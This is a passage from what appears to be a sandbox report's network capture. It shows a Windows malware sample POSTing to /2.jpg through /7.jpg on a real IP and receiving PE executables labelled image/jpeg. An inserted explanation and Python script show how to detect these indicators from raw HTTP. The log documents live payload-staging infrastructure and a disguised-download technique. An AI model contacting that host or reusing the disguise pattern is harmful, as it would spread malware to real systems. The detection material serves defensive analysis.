00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R
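The exchange above, and each of the ones that follow, carries the two traits the report's signatures call out ("Posts data to a JPG file (protocol mismatch)" and "Downloads files with wrong headers with respect to MIME Content-Type"): the request is a POST whose 25-byte multipart body is nothing but the closing boundary `--1BEF0A57BE110FD467A--`, the same boundary reused verbatim for every .jpg URL, and the response declares `Content-Type: image/jpeg` while its body opens with the PE `MZ` header. The Python below is an added example, not part of the sandbox output, showing how a proxy log or PCAP post-processor can derive those indicators from raw HTTP bytes. The sample messages are a trimmed reconstruction of the first exchange (headers plus the first 16 body bytes); the real response body was 645592 bytes.

```python
import re

# Constructed sample: a trimmed reconstruction of the first exchange in the
# capture above (request for /1.jpg and the head of its 200 response). Only
# the first 16 body bytes are kept; the real body was 645592 bytes long.
SAMPLE_REQUEST = (
    b"POST /1.jpg HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\n"
    b"Content-Length: 25\r\n"
    b"Host: 198.98.60.43\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"--1BEF0A57BE110FD467A--\r\n"
)

SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24\r\n"
    b"Content-Length: 645592\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)

# Magic-byte table for the content types worth telling apart here.
MAGIC = (
    (b"MZ", "application/x-dosexec"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF8", "image/gif"),
    (b"PK\x03\x04", "application/zip"),
)


def split_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def sniff_mime(body):
    """Return the MIME type implied by the body's leading bytes, or None if unknown."""
    for magic, mime in MAGIC:
        if body.startswith(magic):
            return mime
    return None


def mime_mismatch(raw_response):
    """Return (declared, sniffed) when Content-Type disagrees with the body's magic, else None."""
    _, headers, body = split_http(raw_response)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = sniff_mime(body)
    if declared and sniffed and declared != sniffed:
        return declared, sniffed
    return None


def multipart_boundary(raw_request):
    """Return the multipart boundary of a POST request, or None if it has none."""
    start, headers, _ = split_http(raw_request)
    if not start.startswith("POST "):
        return None
    m = re.search(r'boundary="?([^";\s]+)"?', headers.get("content-type", ""))
    return m.group(1) if m else None


def empty_multipart_post(raw_request):
    """True when a multipart POST body holds nothing but the closing boundary (no parts at all)."""
    boundary = multipart_boundary(raw_request)
    if boundary is None:
        return False
    _, _, body = split_http(raw_request)
    return body.strip() == b"--" + boundary.encode("latin-1") + b"--"


def reused_boundary(raw_requests):
    """True when several multipart POSTs share one boundary; real clients pick a fresh random one per request."""
    seen = {multipart_boundary(r) for r in raw_requests}
    seen.discard(None)
    return len(raw_requests) > 1 and len(seen) == 1


def triage(raw_request, raw_response):
    """Collect the indicators for one request/response pair as short tags."""
    tags = []
    if empty_multipart_post(raw_request):
        tags.append("empty-multipart-post")
    mismatch = mime_mismatch(raw_response)
    if mismatch:
        tags.append("mime-mismatch:%s->%s" % mismatch)
    return tags


if __name__ == "__main__":
    print(triage(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

Run over the whole capture, `reused_boundary` fires on the six requests because they all present the identical boundary, and `triage` tags every pair with both indicators; a JPEG fetched by a browser would instead yield a GET, a fresh boundary on any upload, and a body starting `ff d8 ff`.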
                                                                May 4, 2021 21:35:14.466412067 CEST | 4309 | OUT | POST /2.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:14.595482111 CEST | 4310 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:14 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT
                                                                ETag: "519d0-58aa824acda80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 334288
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                May 4, 2021 21:35:15.075830936 CEST | 4660 | OUT | POST /3.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.204968929 CEST | 4661 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT
                                                                ETag: "217d0-58aa825fc8c00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 137168
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                May 4, 2021 21:35:15.255719900 CEST | 4805 | OUT | POST /4.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.383333921 CEST | 4806 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT
                                                                ETag: "6b738-58aa826952280"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440120
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                May 4, 2021 21:35:15.994914055 CEST | 5291 | OUT | POST /5.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:16.123927116 CEST | 5316 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:16 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT
                                                                ETag: "1303d0-58aa8276ac200"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1246160
                                                                Keep-Alive: timeout=5, max=95
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                May 4, 2021 21:35:20.831506014 CEST | 6674 | OUT | POST /7.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
